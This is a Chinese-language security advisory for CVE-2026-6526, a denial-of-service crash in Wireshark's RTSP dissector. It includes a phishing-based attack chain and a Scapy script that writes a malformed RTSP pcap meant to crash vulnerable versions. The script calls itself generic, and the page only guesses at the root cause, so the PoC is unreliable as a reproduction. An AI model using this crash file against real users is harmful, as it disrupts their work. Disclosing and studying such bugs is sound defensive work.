IPBUF安全漏洞报告
English
CVE-2026-6526 CVSS 5.5 中危

CVE-2026-6526 Wireshark RTSP协议解析器拒绝服务漏洞

披露日期: 2026-04-30

漏洞信息

漏洞编号
CVE-2026-6526
漏洞类型
拒绝服务
CVSS评分
5.5 中危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Wireshark

相关标签

拒绝服务WiresharkRTSPDoSCrash网络协议分析

漏洞概述

Wireshark是一款流行的网络协议分析器,广泛用于网络故障排除和安全分析。在Wireshark 4.6.0至4.6.4版本中,RTSP协议解析组件存在一个严重的安全漏洞。该漏洞允许攻击者通过诱导用户打开包含特制RTSP数据包的捕获文件,触发解析器崩溃。由于CVSS评分为5.5(中危),且攻击向量为本地(AV:L),攻击者需要一定的用户交互(UI:R)才能实施攻击。成功利用此漏洞将导致Wireshark应用程序异常终止,造成拒绝服务,中断网络分析工作。

技术细节

该漏洞的根源在于Wireshark的RTSP(Real Time Streaming Protocol)协议解析器在处理特定格式的网络流量时存在逻辑错误。RTSP解析器负责解码网络数据包中的RTSP控制信息,但在上述受影响版本中,解析器未能充分验证数据包的特定字段或数据长度。当解析器遇到恶意构造的畸形RTSP数据包时,可能会发生内存访问越界、空指针解引用或堆栈溢出等异常情况。根据CVSS向量CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H,该漏洞主要影响系统的可用性(A:H),不会导致机密性泄露或完整性破坏。攻击者通常通过发送恶意邮件附件或诱导下载特制的.pcap文件来触发此漏洞,一旦用户在Wireshark中打开该文件,解析过程即会触发崩溃。

攻击链分析

STEP 1
步骤1:制作恶意数据包
攻击者分析Wireshark RTSP解析器的源码或通过模糊测试发现漏洞点,构造包含畸形字段或异常长度的RTSP协议数据包。
STEP 2
步骤2:封装抓包文件
将恶意构造的数据包封装成标准的网络抓包文件(如.pcap或.pcapng格式)。
STEP 3
步骤3:社会工程学投递
攻击者通过电子邮件、钓鱼网站或文件共享渠道,诱导受害者下载并保存该恶意抓包文件。
STEP 4
步骤4:触发漏洞
受害者使用存在漏洞的Wireshark版本(4.6.0-4.6.4)打开该文件进行流量分析。
STEP 5
步骤5:拒绝服务
Wireshark的RTSP解析器在处理恶意数据包时发生崩溃,导致应用程序意外关闭,服务中断。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
from scapy.all import * import sys # Define a crafted packet targeting RTSP def generate_malicious_pcap(filename): # Create a TCP packet with a crafted payload to simulate malicious RTSP traffic # This is a generic PoC structure for a dissector crash. payload = b"RTSP/1.0 200 OK\r\n" + b"CSeq: 1\r\n" + b"Content-Length: 99999999\r\n\r\n" + b"A" * 10000 packet = IP(dst="127.0.0.1")/TCP(dport=554, sport=12345)/Raw(load=payload) # Save the packet to a pcap file wrpcap(filename, packet) print(f"[+] Malicious pcap file generated: {filename}") print("[+] Open this file in Wireshark (vulnerable versions) to reproduce the crash.") if __name__ == "__main__": generate_malicious_pcap("cve_2026_6526.pcap")

影响范围

Wireshark 4.6.0
Wireshark 4.6.1
Wireshark 4.6.2
Wireshark 4.6.3
Wireshark 4.6.4

防御指南

临时缓解措施
建议用户立即检查当前使用的Wireshark版本。如果处于受影响范围内(4.6.0至4.6.4),请务必升级到官方发布的修复版本。在无法立即升级的情况下,应避免打开来源不明的.pcap文件,尤其是涉及RTSP协议流量的文件,以防止应用程序崩溃导致的数据丢失或工作中断。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表